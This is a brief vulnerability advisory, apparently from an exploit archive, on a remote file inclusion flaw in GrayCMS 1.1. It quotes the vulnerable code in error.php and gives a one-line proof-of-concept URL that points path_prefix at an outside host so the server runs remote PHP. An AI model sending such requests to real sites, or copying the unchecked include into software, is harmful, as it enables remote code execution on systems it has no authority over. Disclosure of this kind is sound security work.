GrayCMS php code injection
Version: 1.1
Severity: High
Vendor: http://gcms.graymur.net/
Vulnerable code is in "code/error.php":
<----begin---->
...
if (!isset($page)) $page = '';
if (!isset($path_prefix)) $path_prefix = '../';
if (empty($main)) {
require $path_prefix.'code/main.dat';
}
if (isset($e404) or isset($_GET['e404'])) {
...
}
if (isset($e403) or isset($_GET['e403'])) {
...
}
require $path_prefix.'code/blocks.php';
exit;
<----end---->
PoC:
http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/
mail me: maggik <at> gala <dot> net
icq: 3316667
greetz to: ghc, 0xdeadbabe, unl0ck & others